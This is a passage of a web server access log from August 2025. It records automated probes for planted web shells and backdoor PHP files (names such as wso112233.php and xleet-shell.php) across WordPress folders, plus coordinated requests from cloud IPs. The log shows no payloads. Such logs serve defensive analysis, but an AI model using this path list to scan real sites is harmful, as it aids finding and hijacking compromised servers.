"https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:00 -0400] "GET /amhlzdhk.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:01 -0400] "GET /balance.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:03 -0400] "GET /curl.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:04 -0400] "GET /database.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:05 -0400] "GET /hyivatpf.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:06 -0400] "GET /index.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:07 -0400] "GET /inputs.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:09 -0400] "GET /nf_tracking.php HTTP/1.1" 301 246 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 216.73.216.186 - - [12/Aug/2025:15:33:10 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 41.142.204.231 - - [12/Aug/2025:15:33:10 -0400] "GET /qkyplyur.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:11 -0400] "GET /slax.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:12 -0400] "GET /tesTlme.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:13 -0400] "GET /todo.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:14 -0400] "GET /ttcecnmc.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:16 -0400] "GET /txfpcuhw.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:17 -0400] "GET /unzipper.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:18 -0400] "GET /unZIPpeRqyr.php HTTP/1.1" 301 246 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:19 -0400] "GET /ut.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:20 -0400] "GET /utchiha2023.php HTTP/1.1" 301 246 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:22 -0400] "GET /uuhoxcyb.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:23 -0400] "GET /webhook.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:24 -0400] "GET /wp-atom.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:25 -0400] "GET /wp-pano.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:26 -0400] "GET /wqjtejxi.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:28 -0400] "GET /wso112233.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:29 -0400] "GET /zvpqaqfb.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:30 -0400] "GET //xl2023.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:31 -0400] "GET //shadow.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:33:32 -0400] "GET //plugin.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 216.73.216.186 - - [12/Aug/2025:15:34:13 -0400] "GET /dental-tourism/teeth-implant/wp-cron.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 173.252.95.15 - - [12/Aug/2025:15:34:19 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 146.190.11.185 - - [12/Aug/2025:15:34:34 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:15:34:34 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:15:34:34 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:15:34:34 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:15:42:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:15:42:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:15:42:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:15:42:50 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:15:44:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:15:44:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:15:44:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:15:44:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:15:45:35 -0400] "GET /xleet.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:45:52 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:46:00 -0400] "GET /xl2023.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:46:05 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:46:23 -0400] "GET /xl2023x.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:46:24 -0400] "GET /install.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:46:33 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:46:42 -0400] "GET /chosen.php?p= HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:46:43 -0400] "GET /xxl.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:46:56 -0400] "GET /mah.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:47:04 -0400] "GET /x.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:47:09 -0400] "GET /wp-admin/about.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:47:23 -0400] "GET /xl.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:47:34 -0400] "GET /wp-content/about.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:47:43 -0400] "GET /wp-admin/install.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:47:49 -0400] "GET /wp-admin/xl2023.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:47:59 -0400] "GET /wp-admin/js/about.php7 HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:48:10 -0400] "GET /wp-includes/xl2023.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:48:12 -0400] "GET /wp-content/install.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:48:21 -0400] "GET /wp-admin/user/about.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:48:30 -0400] "GET /.well-known/acme-challenge/iR7SzrsOUEP.php HTTP/1.1" 301 277 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:48:32 -0400] "GET /wp-includes/install.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:48:48 -0400] "GET /wp-admin/includes/iR7SzrsOUEP.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:48:51 -0400] "GET /wp-admin/images/admin.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:49:03 -0400] "GET /wp-includes/Text/about.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:49:07 -0400] "GET /wp-admin/maint/iR7SzrsOUEP.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:49:20 -0400] "GET /wp-admin/network/admin.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:49:23 -0400] "GET /wp-content/upgrade/iR7SzrsOUEP.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:49:41 -0400] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:49:42 -0400] "GET /images/iR7SzrsOUEP.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:49:56 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:49:59 -0400] "GET /wp-admin/user/iR7SzrsOUEP.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:50:05 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:50:16 -0400] "GET /wp-content/uploads/index.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:50:19 -0400] "GET /wp-admin/js/widgets/iR7SzrsOUEP.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:50:28 -0400] "GET /wp-content/themes/twentytwentythree/patterns/index.php HTTP/1.1" 301 289 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:15:50:40 -0400] "GET /wp-admin/network/iR7SzrsOUEP.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:50:59 -0400] "GET /wp-admin/images/iR7SzrsOUEP.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:51:20 -0400] "GET /.well-known/pki-validation/iR7SzrsOUEP.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:51:30 -0400] "GET /xleet-shell.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:51:47 -0400] "GET /admin-heade.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:52:04 -0400] "GET /cgi-bin/iR7SzrsOUEP.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:52:22 -0400] "GET /wp-content/xl2023.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:52:40 -0400] "GET /wp-content/xl2023.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:52:59 -0400] "GET /iR7SzrsOUEP.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:53:18 -0400] "GET /wp-content/uploads/xl2023.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:15:55:28 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:15:55:28 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:15:55:28 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:15:55:28 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:15:58:19 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:15:58:19 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:15:58:19 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:15:58:19 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:15:58:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:15:58:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:15:58:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:15:58:29 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:16:00:12 -0400] "GET /wp-content/themes/westand/include/lang_upload.php HTTP/1.1" 